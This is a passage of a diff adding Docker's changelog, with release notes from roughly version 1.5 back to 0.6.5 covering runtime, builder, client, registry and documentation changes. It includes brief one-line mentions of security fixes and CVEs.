+* Better integration with host system: containers will reflect changes to the host's `/etc/resolv.conf` file when restarted
+* Better integration with host system: per-container iptable rules are moved to the DOCKER chain
+- Fixed container exiting on out of memory to return an invalid exit code
+
+#### Other
+* The HTTP_PROXY, HTTPS_PROXY, and NO_PROXY environment variables are properly taken into account by the client when connecting to the Docker daemon
+
+## 1.4.1 (2014-12-15)
+
+#### Runtime
+- Fix issue with volumes-from and bind mounts not being honored after create
+
+## 1.4.0 (2014-12-11)
+
+#### Notable Features since 1.3.0
++ Set key=value labels to the daemon (displayed in `docker info`), applied with
+  new `-label` daemon flag
++ Add support for `ENV` in Dockerfile of the form:
+  `ENV name=value name2=value2...`
++ New Overlayfs Storage Driver
++ `docker info` now returns an `ID` and `Name` field
++ Filter events by event name, container, or image
++ `docker cp` now supports copying from container volumes
+- Fixed `docker tag`, so it honors `--force` when overriding a tag for existing
+  image.
+
+## 1.3.3 (2014-12-11)
+
+#### Security
+- Fix path traversal vulnerability in processing of absolute symbolic links (CVE-2014-9356)
+- Fix decompression of xz image archives, preventing privilege escalation (CVE-2014-9357)
+- Validate image IDs (CVE-2014-9358)
+
+#### Runtime
+- Fix an issue when image archives are being read slowly
+
+#### Client
+- Fix a regression related to stdin redirection
+- Fix a regression with `docker cp` when destination is the current directory
+
+## 1.3.2 (2014-11-20)
+
+#### Security
+- Fix tar breakout vulnerability
+* Extractions are now sandboxed chroot
+- Security options are no longer committed to images
+
+#### Runtime
+- Fix deadlock in `docker ps -f exited=1`
+- Fix a bug when `--volumes-from` references a container that failed to start
+
+#### Registry
++ `--insecure-registry` now accepts CIDR notation such as 10.1.0.0/16
+* Private registries whose IPs fall in the 127.0.0.0/8 range do no need the `--insecure-registry` flag
+- Skip the experimental registry v2 API when mirroring is enabled
+
+## 1.3.1 (2014-10-28)
+
+#### Security
+* Prevent fallback to SSL protocols < TLS 1.0 for client, daemon and registry
++ Secure HTTPS connection to registries with certificate verification and without HTTP fallback unless `--insecure-registry` is specified
+
+#### Runtime
+- Fix issue where volumes would not be shared
+
+#### Client
+- Fix issue with `--iptables=false` not automatically setting `--ip-masq=false`
+- Fix docker run output to non-TTY stdout
+
+#### Builder
+- Fix escaping `$` for environment variables
+- Fix issue with lowercase `onbuild` Dockerfile instruction
+- Restrict environment variable expansion to `ENV`, `ADD`, `COPY`, `WORKDIR`, `EXPOSE`, `VOLUME` and `USER`
+
+## 1.3.0 (2014-10-14)
+
+#### Notable features since 1.2.0
++ Docker `exec` allows you to run additional processes inside existing containers
++ Docker `create` gives you the ability to create a container via the CLI without executing a process
++ `--security-opts` options to allow user to customize container labels and apparmor profiles
++ Docker `ps` filters
+- Wildcard support to COPY/ADD
++ Move production URLs to get.docker.com from get.docker.io
++ Allocate IP address on the bridge inside a valid CIDR
++ Use drone.io for PR and CI testing
++ Ability to setup an official registry mirror
++ Ability to save multiple images with docker `save`
+
+## 1.2.0 (2014-08-20)
+
+#### Runtime
++ Make /etc/hosts /etc/resolv.conf and /etc/hostname editable at runtime
++ Auto-restart containers using policies
++ Use /var/lib/docker/tmp for large temporary files
++ `--cap-add` and `--cap-drop` to tweak what linux capability you want
++ `--device` to use devices in containers
+
+#### Client
++ `docker search` on private registries
++ Add `exited` filter to `docker ps --filter`
+* `docker rm -f` now kills instead of stop
++ Support for IPv6 addresses in `--dns` flag
+
+#### Proxy
++ Proxy instances in separate processes
+* Small bug fix on UDP proxy
+
+## 1.1.2 (2014-07-23)
+
+#### Runtime
++ Fix port allocation for existing containers
++ Fix containers restart on daemon restart
+
+#### Packaging
++ Fix /etc/init.d/docker issue on Debian
+
+## 1.1.1 (2014-07-09)
+
+#### Builder
+* Fix issue with ADD
+
+## 1.1.0 (2014-07-03)
+
+#### Notable features since 1.0.1
++ Add `.dockerignore` support
++ Pause containers during `docker commit`
++ Add `--tail` to `docker logs`
+
+#### Builder
++ Allow a tar file as context for `docker build`
+* Fix issue with white-spaces and multi-lines in `Dockerfiles`
+
+#### Runtime
+* Overall performance improvements
+* Allow `/` as source of `docker run -v`
+* Fix port allocation
+* Fix bug in `docker save`
+* Add links information to `docker inspect`
+
+#### Client
+* Improve command line parsing for `docker commit`
+
+#### Remote API
+* Improve status code for the `start` and `stop` endpoints
+
+## 1.0.1 (2014-06-19)
+
+#### Notable features since 1.0.0
+* Enhance security for the LXC driver
+
+#### Builder
+* Fix `ONBUILD` instruction passed to grandchildren
+
+#### Runtime
+* Fix events subscription
+* Fix /etc/hostname file with host networking
+* Allow `-h` and `--net=none`
+* Fix issue with hotplug devices in `--privileged`
+
+#### Client
+* Fix artifacts with events
+* Fix a panic with empty flags
+* Fix `docker cp` on Mac OS X
+
+#### Miscellaneous
+* Fix compilation on Mac OS X
+* Fix several races
+
+## 1.0.0 (2014-06-09)
+
+#### Notable features since 0.12.0
+* Production support
+
+## 0.12.0 (2014-06-05)
+
+#### Notable features since 0.11.0
+* 40+ various improvements to stability, performance and usability
+* New `COPY` Dockerfile instruction to allow copying a local file from the context into the container without ever extracting if the file is a tar file
+* Inherit file permissions from the host on `ADD`
+* New `pause` and `unpause` commands to allow pausing and unpausing of containers using cgroup freezer
+* The `images` command has a `-f`/`--filter` option to filter the list of images
+* Add `--force-rm` to clean up after a failed build
+* Standardize JSON keys in Remote API to CamelCase
+* Pull from a docker run now assumes `latest` tag if not specified
+* Enhance security on Linux capabilities and device nodes
+
+## 0.11.1 (2014-05-07)
+
+#### Registry
+- Fix push and pull to private registry
+
+## 0.11.0 (2014-05-07)
+
+#### Notable features since 0.10.0
+
+* SELinux support for mount and process labels
+* Linked containers can be accessed by hostname
+* Use the net `--net` flag to allow advanced network configuration such as host networking so that containers can use the host's network interfaces
+* Add a ping endpoint to the Remote API to do healthchecks of your docker daemon
+* Logs can now be returned with an optional timestamp
+* Docker now works with registries that support SHA-512
+* Multiple registry endpoints are supported to allow registry mirrors
+
+## 0.10.0 (2014-04-08)
+
+#### Builder
+- Fix printing multiple messages on a single line. Fixes broken output during builds.
+- Follow symlinks inside container's root for ADD build instructions.
+- Fix EXPOSE caching.
+
+#### Documentation
+- Add the new options of `docker ps` to the documentation.
+- Add the options of `docker restart` to the documentation.
+- Update daemon docs and help messages for --iptables and --ip-forward.
+- Updated apt-cacher-ng docs example.
+- Remove duplicate description of --mtu from docs.
+- Add missing -t and -v for `docker images` to the docs.
+- Add fixes to the cli docs.
+- Update libcontainer docs.
+- Update images in docs to remove references to AUFS and LXC.
+- Update the nodejs_web_app in the docs to use the new epel RPM address.
+- Fix external link on security of containers.
+- Update remote API docs.
+- Add image size to history docs.
+- Be explicit about binding to all interfaces in redis example.
+- Document DisableNetwork flag in the 1.10 remote api.
+- Document that `--lxc-conf` is lxc only.
+- Add chef usage documentation.
+- Add example for an image with multiple for `docker load`.
+- Explain what `docker run -a` does in the docs.
+
+#### Contrib
+- Add variable for DOCKER_LOGFILE to sysvinit and use append instead of overwrite in opening the logfile.
+- Fix init script cgroup mounting workarounds to be more similar to cgroupfs-mount and thus work properly.
+- Remove inotifywait hack from the upstart host-integration example because it's not necessary any more.
+- Add check-config script to contrib.
+- Fix fish shell completion.
+
+#### Hack
+* Clean up "go test" output from "make test" to be much more readable/scannable.
+* Exclude more "definitely not unit tested Go source code" directories from hack/make/test.
++ Generate md5 and sha256 hashes when building, and upload them via hack/release.sh.
+- Include contributed completions in Ubuntu PPA.
++ Add cli integration tests.
+* Add tweaks to the hack scripts to make them simpler.
+
+#### Remote API
++ Add TLS auth support for API.
+* Move git clone from daemon to client.
+- Fix content-type detection in docker cp.
+* Split API into 2 go packages.
+
+#### Runtime
+* Support hairpin NAT without going through Docker server.
+- devicemapper: succeed immediately when removing non-existent devices.
+- devicemapper: improve handling of devicemapper devices (add per device lock, increase sleep time and unlock while sleeping).
+- devicemapper: increase timeout in waitClose to 10 seconds.
+- devicemapper: ensure we shut down thin pool cleanly.
+- devicemapper: pass info, rather than hash to activateDeviceIfNeeded, deactivateDevice, setInitialized, deleteDevice.
+- devicemapper: avoid AB-BA deadlock.
+- devicemapper: make shutdown better/faster.
+- improve alpha sorting in mflag.
+- Remove manual http cookie management because the cookiejar is being used.
+- Use BSD raw mode on Darwin. Fixes nano, tmux and others.
+- Add FreeBSD support for the client.
+- Merge auth package into registry.
+- Add deprecation warning for -t on `docker pull`.
+- Remove goroutine leak on error.
+- Update parseLxcInfo to comply with new lxc1.0 format.
+- Fix attach exit on darwin.
+- Improve deprecation message.
+- Retry to retrieve the layer metadata up to 5 times for `docker pull`.
+- Only unshare the mount namespace for execin.
+- Merge existing config when committing.
+- Disable daemon startup timeout.
+- Fix issue #4681: add loopback interface when networking is disabled.
+- Add failing test case for issue #4681.
+- Send SIGTERM to child, instead of SIGKILL.
+- Show the driver and the kernel version in `docker info` even when not in debug mode.
+- Always symlink /dev/ptmx for libcontainer. This fixes console related problems.
+- Fix issue caused by the absence of /etc/apparmor.d.
+- Don't leave empty cidFile behind when failing to create the container.
+- Mount cgroups automatically if they're not mounted already.
+- Use mock for search tests.
+- Update to double-dash everywhere.
+- Move .dockerenv parsing to lxc driver.
+- Move all bind-mounts in the container inside the namespace.
+- Don't use separate bind mount for container.
+- Always symlink /dev/ptmx for libcontainer.
+- Don't kill by pid for other drivers.
+- Add initial logging to libcontainer.
+* Sort by port in `docker ps`.
+- Move networking drivers into runtime top level package.
++ Add --no-prune to `docker rmi`.
++ Add time since exit in `docker ps`.
+- graphdriver: add build tags.
+- Prevent allocation of previously allocated ports & prevent improve port allocation.
+* Add support for --since/--before in `docker ps`.
+- Clean up container stop.
++ Add support for configurable dns search domains.
+- Add support for relative WORKDIR instructions.
+- Add --output flag for docker save.
+- Remove duplication of DNS entries in config merging.
+- Add cpuset.cpus to cgroups and native driver options.
+- Remove docker-ci.
+- Promote btrfs. btrfs is no longer considered experimental.
+- Add --input flag to `docker load`.
+- Return error when existing bridge doesn't match IP address.
+- Strip comments before parsing line continuations to avoid interpreting instructions as comments.
+- Fix TestOnlyLoopbackExistsWhenUsingDisableNetworkOption to ignore "DOWN" interfaces.
+- Add systemd implementation of cgroups and make containers show up as systemd units.
+- Fix commit and import when no repository is specified.
+- Remount /var/lib/docker as --private to fix scaling issue.
+- Use the environment's proxy when pinging the remote registry.
+- Reduce error level from harmless errors.
+* Allow --volumes-from to be individual files.
+- Fix expanding buffer in StdCopy.
+- Set error regardless of attach or stdin. This fixes #3364.
+- Add support for --env-file to load environment variables from files.
+- Symlink /etc/mtab and /proc/mounts.
+- Allow pushing a single tag.
+- Shut down containers cleanly at shutdown and wait forever for the containers to shut down. This makes container shutdown on daemon shutdown work properly via SIGTERM.
+- Don't throw error when starting an already running container.
+- Fix dynamic port allocation limit.
+- remove setupDev from libcontainer.
+- Add API version to `docker version`.
+- Return correct exit code when receiving signal and make SIGQUIT quit without cleanup.
+- Fix --volumes-from mount failure.
+- Allow non-privileged containers to create device nodes.
+- Skip login tests because of external dependency on a hosted service.
+- Deprecate `docker images --tree` and `docker images --viz`.
+- Deprecate `docker insert`.
+- Include base abstraction for apparmor. This fixes some apparmor related problems on Ubuntu 14.04.
+- Add specific error message when hitting 401 over HTTP on push.
+- Fix absolute volume check.
+- Remove volumes-from from the config.
+- Move DNS options to hostconfig.
+- Update the apparmor profile for libcontainer.
+- Add deprecation notice for `docker commit -run`.
+
+## 0.9.1 (2014-03-24)
+
+#### Builder
+- Fix printing multiple messages on a single line. Fixes broken output during builds.
+
+#### Documentation
+- Fix external link on security of containers.
+
+#### Contrib
+- Fix init script cgroup mounting workarounds to be more similar to cgroupfs-mount and thus work properly.
+- Add variable for DOCKER_LOGFILE to sysvinit and use append instead of overwrite in opening the logfile.
+
+#### Hack
+- Generate md5 and sha256 hashes when building, and upload them via hack/release.sh.
+
+#### Remote API
+- Fix content-type detection in `docker cp`.
+
+#### Runtime
+- Use BSD raw mode on Darwin. Fixes nano, tmux and others.
+- Only unshare the mount namespace for execin.
+- Retry to retrieve the layer metadata up to 5 times for `docker pull`.
+- Merge existing config when committing.
+- Fix panic in monitor.
+- Disable daemon startup timeout.
+- Fix issue #4681: add loopback interface when networking is disabled.
+- Add failing test case for issue #4681.
+- Send SIGTERM to child, instead of SIGKILL.
+- Show the driver and the kernel version in `docker info` even when not in debug mode.
+- Always symlink /dev/ptmx for libcontainer. This fixes console related problems.
+- Fix issue caused by the absence of /etc/apparmor.d.
+- Don't leave empty cidFile behind when failing to create the container.
+- Improve deprecation message.
+- Fix attach exit on darwin.
+- devicemapper: improve handling of devicemapper devices (add per device lock, increase sleep time, unlock while sleeping).
+- devicemapper: succeed immediately when removing non-existent devices.
+- devicemapper: increase timeout in waitClose to 10 seconds.
+- Remove goroutine leak on error.
+- Update parseLxcInfo to comply with new lxc1.0 format.
+
+## 0.9.0 (2014-03-10)
+
+#### Builder
+- Avoid extra mount/unmount during build. This fixes mount/unmount related errors during build.
+- Add error to docker build --rm. This adds missing error handling.
+- Forbid chained onbuild, `onbuild from` and  `onbuild maintainer` triggers.
+- Make `--rm` the default for `docker build`.
+
+#### Documentation
+- Download the docker client binary for Mac over https.
+- Update the titles of the install instructions & descriptions.
+* Add instructions for upgrading boot2docker.
+* Add port forwarding example in OS X install docs.
+- Attempt to disentangle repository and registry.
+- Update docs to explain more about `docker ps`.
+- Update sshd example to use a Dockerfile.
+- Rework some examples, including the Python examples.
+- Update docs to include instructions for a container's lifecycle.
+- Update docs documentation to discuss the docs branch.
+- Don't skip cert check for an example & use HTTPS.
+- Bring back the memory and swap accounting section which was lost when the kernel page was removed.
+- Explain DNS warnings and how to fix them on systems running and using a local nameserver.
+
+#### Contrib
+- Add Tanglu support for mkimage-debootstrap.
+- Add SteamOS support for mkimage-debootstrap.
+
+#### Hack
+- Get package coverage when running integration tests.
+- Remove the Vagrantfile. This is being replaced with boot2docker.
+- Fix tests on systems where aufs isn't available.
+- Update packaging instructions and remove the dependency on lxc.
+
+#### Remote API
+* Move code specific to the API to the api package.
+- Fix header content type for the API. Makes all endpoints use proper content type.
+- Fix registry auth & remove ping calls from CmdPush and CmdPull.
+- Add newlines to the JSON stream functions.
+
+#### Runtime
+* Do not ping the registry from the CLI. All requests to registries flow through the daemon.
+- Check for nil information return in the lxc driver. This fixes panics with older lxc versions.
+- Devicemapper: cleanups and fix for unmount. Fixes two problems which were causing unmount to fail intermittently.
+- Devicemapper: remove directory when removing device. Directories don't get left behind when removing the device.
+* Devicemapper: enable skip_block_zeroing. Improves performance by not zeroing blocks.
+- Devicemapper: fix shutdown warnings. Fixes shutdown warnings concerning pool device removal.
+- Ensure docker cp stream is closed properly. Fixes problems with files not being copied by `docker cp`.
+- Stop making `tcp://` default to `127.0.0.1:4243` and remove the default port for tcp.
+- Fix `--run` in `docker commit`. This makes `docker commit --run` work again.
+- Fix custom bridge related options. This makes custom bridges work again.
++ Mount-bind the PTY as container console. This allows tmux/screen to run.
++ Add the pure Go libcontainer library to make it possible to run containers using only features of the Linux kernel.
++ Add native exec driver which uses libcontainer and make it the default exec driver.
+- Add support for handling extended attributes in archives.
+* Set the container MTU to be the same as the host MTU.
++ Add simple sha256 checksums for layers to speed up `docker push`.
+* Improve kernel version parsing.
+* Allow flag grouping (`docker run -it`).
+- Remove chroot exec driver.
+- Fix divide by zero to fix panic.
+- Rewrite `docker rmi`.
+- Fix docker info with lxc 1.0.0.
+- Fix fedora tty with apparmor.
+* Don't always append env vars, replace defaults with vars from config.
+* Fix a goroutine leak.
+* Switch to Go 1.2.1.
+- Fix unique constraint error checks.
+* Handle symlinks for Docker's data directory and for TMPDIR.
+- Add deprecation warnings for flags (-flag is deprecated in favor of --flag)
+- Add apparmor profile for the native execution driver.
+* Move system specific code from archive to pkg/system.
+- Fix duplicate signal for `docker run -i -t` (issue #3336).
+- Return correct process pid for lxc.
+- Add a -G option to specify the group which unix sockets belong to.
++ Add `-f` flag to `docker rm` to force removal of running containers.
++ Kill ghost containers and restart all ghost containers when the docker daemon restarts.
++ Add `DOCKER_RAMDISK` environment variable to make Docker work when the root is on a ramdisk.
+
+## 0.8.1 (2014-02-18)
+
+#### Builder
+
+- Avoid extra mount/unmount during build. This removes an unneeded mount/unmount operation which was causing problems with devicemapper
+- Fix regression with ADD of tar files. This stops Docker from decompressing tarballs added via ADD from the local file system
+- Add error to `docker build --rm`. This adds a missing error check to ensure failures to remove containers are detected and reported
+
+#### Documentation
+
+* Update issue filing instructions
+* Warn against the use of symlinks for Docker's storage folder
+* Replace the Firefox example with an IceWeasel example
+* Rewrite the PostgreSQL example using a Dockerfile and add more details to it
+* Improve the OS X documentation
+
+#### Remote API
+
+- Fix broken images API for version less than 1.7
+- Use the right encoding for all API endpoints which return JSON
+- Move remote api client to api/
+- Queue calls to the API using generic socket wait
+
+#### Runtime
+
+- Fix the use of custom settings for bridges and custom bridges
+- Refactor the devicemapper code to avoid many mount/unmount race conditions and failures
+- Remove two panics which could make Docker crash in some situations
+- Don't ping registry from the CLI client
+- Enable skip_block_zeroing for devicemapper. This stops devicemapper from always zeroing entire blocks
+- Fix --run in `docker commit`. This makes docker commit store `--run` in the image configuration
+- Remove directory when removing devicemapper device. This cleans up leftover mount directories
+- Drop NET_ADMIN capability for non-privileged containers. Unprivileged containers can't change their network configuration
+- Ensure `docker cp` stream is closed properly
+- Avoid extra mount/unmount during container registration. This removes an unneeded mount/unmount operation which was causing problems with devicemapper
+- Stop allowing tcp:// as a default tcp bin address which binds to 127.0.0.1:4243 and remove the default port
++ Mount-bind the PTY as container console. This allows tmux and screen to run in a container
+- Clean up archive closing. This fixes and improves archive handling
+- Fix engine tests on systems where temp directories are symlinked
+- Add test methods for save and load
+- Avoid temporarily unmounting the container when restarting it. This fixes a race for devicemapper during restart
+- Support submodules when building from a GitHub repository
+- Quote volume path to allow spaces
+- Fix remote tar ADD behavior. This fixes a regression which was causing Docker to extract tarballs
+
+## 0.8.0 (2014-02-04)
+
+#### Notable features since 0.7.0
+
+* Images and containers can be removed much faster
+* Building an image from source with docker build is now much faster
+* The Docker daemon starts and stops much faster
+* The memory footprint of many common operations has been reduced, by streaming files instead of buffering them in memory, fixing memory leaks, and fixing various suboptimal memory allocations
+* Several race conditions were fixed, making Docker more stable under very high concurrency load. This makes Docker more stable and less likely to crash and reduces the memory footprint of many common operations
+* All packaging operations are now built on the Go language’s standard tar implementation, which is bundled with Docker itself. This makes packaging more portable across host distributions, and solves several issues caused by quirks and incompatibilities between different distributions of tar
+* Docker can now create, remove and modify larger numbers of containers and images graciously thanks to more aggressive releasing of system resources. For example the storage driver API now allows Docker to do reference counting on mounts created by the drivers
+With the ongoing changes to the networking and execution subsystems of docker testing these areas have been a focus of the refactoring.  By moving these subsystems into separate packages we can test, analyze, and monitor coverage and quality of these packages
+* Many components have been separated into smaller sub-packages, each with a dedicated test suite. As a result the code is better-tested, more readable and easier to change
+
+* The ADD instruction now supports caching, which avoids unnecessarily re-uploading the same source content again and again when it hasn’t changed
+* The new ONBUILD instruction adds to your image a “trigger” instruction to be executed at a later time, when the image is used as the base for another build
+* Docker now ships with an experimental storage driver which uses the BTRFS filesystem for copy-on-write
+* Docker is officially supported on Mac OS X
+* The Docker daemon supports systemd socket activation
+
+## 0.7.6 (2014-01-14)
+
+#### Builder
+
+* Do not follow symlink outside of build context
+
+#### Runtime
+
+- Remount bind mounts when ro is specified
+* Use https for fetching docker version
+
+#### Other
+
+* Inline the test.docker.io fingerprint
+* Add ca-certificates to packaging documentation
+
+## 0.7.5 (2014-01-09)
+
+#### Builder
+
+* Disable compression for build. More space usage but a much faster upload
+- Fix ADD caching for certain paths
+- Do not compress archive from git build
+
+#### Documentation
+
+- Fix error in GROUP add example
+* Make sure the GPG fingerprint is inline in the documentation
+* Give more specific advice on setting up signing of commits for DCO
+
+#### Runtime
+
+- Fix misspelled container names
+- Do not add hostname when networking is disabled
+* Return most recent image from the cache by date
+- Return all errors from docker wait
+* Add Content-Type Header "application/json" to GET /version and /info responses
+
+#### Other
+
+* Update DCO to version 1.1
++ Update Makefile to use "docker:GIT_BRANCH" as the generated image name
+* Update Travis to check for new 1.1 DCO version
+
+## 0.7.4 (2014-01-07)
+
+#### Builder
+
+- Fix ADD caching issue with . prefixed path
+- Fix docker build on devicemapper by reverting sparse file tar option
+- Fix issue with file caching and prevent wrong cache hit
+* Use same error handling while unmarshalling CMD and ENTRYPOINT
+
+#### Documentation
+
+* Simplify and streamline Amazon Quickstart
+* Install instructions use unprefixed Fedora image
+* Update instructions for mtu flag for Docker on GCE
++ Add Ubuntu Saucy to installation
+- Fix for wrong version warning on master instead of latest
+
+#### Runtime
+
+- Only get the image's rootfs when we need to calculate the image size
+- Correctly handle unmapping UDP ports
+* Make CopyFileWithTar use a pipe instead of a buffer to save memory on docker build
+- Fix login message to say pull instead of push
+- Fix "docker load" help by removing "SOURCE" prompt and mentioning STDIN
+* Make blank -H option default to the same as no -H was sent
+* Extract cgroups utilities to own submodule
+
+#### Other
+
++ Add Travis CI configuration to validate DCO and gofmt requirements
++ Add Developer Certificate of Origin Text
+* Upgrade VBox Guest Additions
+* Check standalone header when pinging a registry server
+
+## 0.7.3 (2014-01-02)
+
+#### Builder
+
++ Update ADD to use the image cache, based on a hash of the added content
+* Add error message for empty Dockerfile
+
+#### Documentation
+
+- Fix outdated link to the "Introduction" on www.docker.io
++ Update the docs to get wider when the screen does
+- Add information about needing to install LXC when using raw binaries
+* Update Fedora documentation to disentangle the docker and docker.io conflict
+* Add a note about using the new `-mtu` flag in several GCE zones
++ Add FrugalWare installation instructions
++ Add a more complete example of `docker run`
+- Fix API documentation for creating and starting Privileged containers
+- Add missing "name" parameter documentation on "/containers/create"
+* Add a mention of `lxc-checkconfig` as a way to check for some of the necessary kernel configuration
+- Update the 1.8 API documentation with some additions that were added to the docs for 1.7
+
+#### Hack
+
+- Add missing libdevmapper dependency to the packagers documentation
+* Update minimum Go requirement to a hard line at Go 1.2+
+* Many minor improvements to the Vagrantfile
++ Add ability to customize dockerinit search locations when compiling (to be used very sparingly only by packagers of platforms who require a nonstandard location)
++ Add coverprofile generation reporting
+- Add `-a` to our Go build flags, removing the need for recompiling the stdlib manually
+* Update Dockerfile to be more canonical and have less spurious warnings during build
+- Fix some miscellaneous `docker pull` progress bar display issues
+* Migrate more miscellaneous packages under the "pkg" folder
+* Update TextMate highlighting to automatically be enabled for files named "Dockerfile"
+* Reorganize syntax highlighting files under a common "contrib/syntax" directory
+* Update install.sh script (https://get.docker.io/) to not fail if busybox fails to download or run at the end of the Ubuntu/Debian installation
+* Add support for container names in bash completion
+
+#### Packaging
+
++ Add an official Docker client binary for Darwin (Mac OS X)
+* Remove empty "Vendor" string and added "License" on deb package
++ Add a stubbed version of "/etc/default/docker" in the deb package
+
+#### Runtime
+
+* Update layer application to extract tars in place, avoiding file churn while handling whiteouts
+- Fix permissiveness of mtime comparisons in tar handling (since GNU tar and Go tar do not yet support sub-second mtime precision)
+* Reimplement `docker top` in pure Go to work more consistently, and even inside Docker-in-Docker (thus removing the shell injection vulnerability present in some versions of `lxc-ps`)
++ Update `-H unix://` to work similarly to `-H tcp://` by inserting the default values for missing portions
+- Fix more edge cases regarding dockerinit and deleted or replaced docker or dockerinit files
+* Update container name validation to include '.'
+- Fix use of a symlink or non-absolute path as the argument to `-g` to work as expected
+* Update to handle external mounts outside of LXC, fixing many small mounting quirks and making future execution backends and other features simpler
+* Update to use proper box-drawing characters everywhere in `docker images -tree`
+* Move MTU setting from LXC configuration to directly use netlink
+* Add `-S` option to external tar invocation for more efficient spare file handling
++ Add arch/os info to User-Agent string, especially for registry requests
++ Add `-mtu` option to Docker daemon for configuring MTU
+- Fix `docker build` to exit with a non-zero exit code on error
++ Add `DOCKER_HOST` environment variable to configure the client `-H` flag without specifying it manually for every invocation
+
+## 0.7.2 (2013-12-16)
+
+#### Runtime
+
++ Validate container names on creation with standard regex
+* Increase maximum image depth to 127 from 42
+* Continue to move api endpoints to the job api
++ Add -bip flag to allow specification of dynamic bridge IP via CIDR
+- Allow bridge creation when ipv6 is not enabled on certain systems
+* Set hostname and IP address from within dockerinit
+* Drop capabilities from within dockerinit
+- Fix volumes on host when symlink is present the image
+- Prevent deletion of image if ANY container is depending on it even if the container is not running
+* Update docker push to use new progress display
+* Use os.Lstat to allow mounting unix sockets when inspecting volumes
+- Adjust handling of inactive user login
+- Add missing defines in devicemapper for older kernels
+- Allow untag operations with no container validation
+- Add auth config to docker build
+
+#### Documentation
+
+* Add more information about Docker logging
++ Add RHEL documentation
+* Add a direct example for changing the CMD that is run in a container
+* Update Arch installation documentation
++ Add section on Trusted Builds
++ Add Network documentation page
+
+#### Other
+
++ Add new cover bundle for providing code coverage reporting
+* Separate integration tests in bundles
+* Make Tianon the hack maintainer
+* Update mkimage-debootstrap with more tweaks for keeping images small
+* Use https to get the install script
+* Remove vendored dotcloud/tar now that Go 1.2 has been released
+
+## 0.7.1 (2013-12-05)
+
+#### Documentation
+
++ Add @SvenDowideit as documentation maintainer
++ Add links example
++ Add documentation regarding ambassador pattern
++ Add Google Cloud Platform docs
++ Add dockerfile best practices
+* Update doc for RHEL
+* Update doc for registry
+* Update Postgres examples
+* Update doc for Ubuntu install
+* Improve remote api doc
+
+#### Runtime
+
++ Add hostconfig to docker inspect
++ Implement `docker log -f` to stream logs
++ Add env variable to disable kernel version warning
++ Add -format to `docker inspect`
++ Support bind-mount for files
+- Fix bridge creation on RHEL
+- Fix image size calculation
+- Make sure iptables are called even if the bridge already exists
+- Fix issue with stderr only attach
+- Remove init layer when destroying a container
+- Fix same port binding on different interfaces
+- `docker build` now returns the correct exit code
+- Fix `docker port` to display correct port
+- `docker build` now check that the dockerfile exists client side
+- `docker attach` now returns the correct exit code
+- Remove the name entry when the container does not exist
+
+#### Registry
+
+* Improve progress bars, add ETA for downloads
+* Simultaneous pulls now waits for the first to finish instead of failing
+- Tag only the top-layer image when pushing to registry
+- Fix issue with offline image transfer
+- Fix issue preventing using ':' in password for registry
+
+#### Other
+
++ Add pprof handler for debug
++ Create a Makefile
+* Use stdlib tar that now includes fix
+* Improve make.sh test script
+* Handle SIGQUIT on the daemon
+* Disable verbose during tests
+* Upgrade to go1.2 for official build
+* Improve unit tests
+* The test suite now runs all tests even if one fails
+* Refactor C in Go (Devmapper)
+- Fix OS X compilation
+
+## 0.7.0 (2013-11-25)
+
+#### Notable features since 0.6.0
+
+* Storage drivers: choose from aufs, device-mapper, or vfs.
+* Standard Linux support: docker now runs on unmodified Linux kernels and all major distributions.
+* Links: compose complex software stacks by connecting containers to each other.
+* Container naming: organize your containers by giving them memorable names.
+* Advanced port redirects: specify port redirects per interface, or keep sensitive ports private.
+* Offline transfer: push and pull images to the filesystem without losing information.
+* Quality: numerous bugfixes and small usability improvements. Significant increase in test coverage.
+
+## 0.6.7 (2013-11-21)
+
+#### Runtime
+
+* Improve stability, fixes some race conditions
+* Skip the volumes mounted when deleting the volumes of container.
+* Fix layer size computation: handle hard links correctly
+* Use the work Path for docker cp CONTAINER:PATH
+* Fix tmp dir never cleanup
+* Speedup docker ps
+* More informative error message on name collisions
+* Fix nameserver regex
+* Always return long id's
+* Fix container restart race condition
+* Keep published ports on docker stop;docker start
+* Fix container networking on Fedora
+* Correctly express "any address" to iptables
+* Fix network setup when reconnecting to ghost container
+* Prevent deletion if image is used by a running container
+* Lock around read operations in graph
+
+#### RemoteAPI
+
+* Return full ID on docker rmi
+
+#### Client
+
++ Add -tree option to images
++ Offline image transfer
+* Exit with status 2 on usage error and display usage on stderr
+* Do not forward SIGCHLD to container
+* Use string timestamp for docker events -since
+
+#### Other
+
+* Update to go 1.2rc5
++ Add /etc/default/docker support to upstart
+
+## 0.6.6 (2013-11-06)
+
+#### Runtime
+
+* Ensure container name on register
+* Fix regression in /etc/hosts
++ Add lock around write operations in graph
+* Check if port is valid
+* Fix restart runtime error with ghost container networking
++ Add some more colors and animals to increase the pool of generated names
+* Fix issues in docker inspect
++ Escape apparmor confinement
++ Set environment variables using a file.
+* Prevent docker insert to erase something
++ Prevent DNS server conflicts in CreateBridgeIface
++ Validate bind mounts on the server side
++ Use parent image config in docker build
+* Fix regression in /etc/hosts
+
+#### Client
+
++ Add -P flag to publish all exposed ports
++ Add -notrunc and -q flags to docker history
+* Fix docker commit, tag and import usage
++ Add stars, trusted builds and library flags in docker search
+* Fix docker logs with tty
+
+#### RemoteAPI
+
+* Make /events API send headers immediately
+* Do not split last column docker top
++ Add size to history
+
+#### Other
+
++ Contrib: Desktop integration. Firefox usecase.
++ Dockerfile: bump to go1.2rc3
+
+## 0.6.5 (2013-10-29)
+
+#### Runtime
+
++ Containers can now be named
++ Containers can now be linked together for service discovery
++ 'run -a', 'start -a' and 'attach' can forward signals to the container for better integration with process supervisors
++ Automatically start crashed containers after a reboot
++ Expose IP, port, and proto as separate environment vars for container links
+* Allow ports to be published to specific ips
+* Prohibit inter-container communication by default
+- Ignore ErrClosedPipe for stdin in Container.Attach
+- Remove unused field kernelVersion
+* Fix issue when mounting subdirectories of /mnt in container
+- Fix untag during removal of images
+* Check return value of syscall.Chdir when changing working directory inside dockerinit
+
+#### Client
+
+- Only pass stdin to hijack when needed to avoid closed pipe errors
+* Use less reflection in command-line method invocation
+- Monitor the tty size after starting the container, not prior
+- Remove useless os.Exit() calls after log.Fatal
+
+#### Hack
+
++ Add initial init scripts library and a safer Ubuntu packaging script that works for Debian
+* Add -p option to invoke debootstrap with http_proxy
+- Update install.sh with $sh_c to get sudo/su for modprobe
+* Update all the mkimage scripts to use --numeric-owner as a tar argument
+* Update hack/release.sh process to automatically invoke hack/make.sh and bail on build and test issues
+
+#### Other
+
+* Documentation: Fix the flags for nc in example
+* Testing: Remove warnings and prevent mount issues
+- Testing: Change logic for tty resize to avoid warning in tests
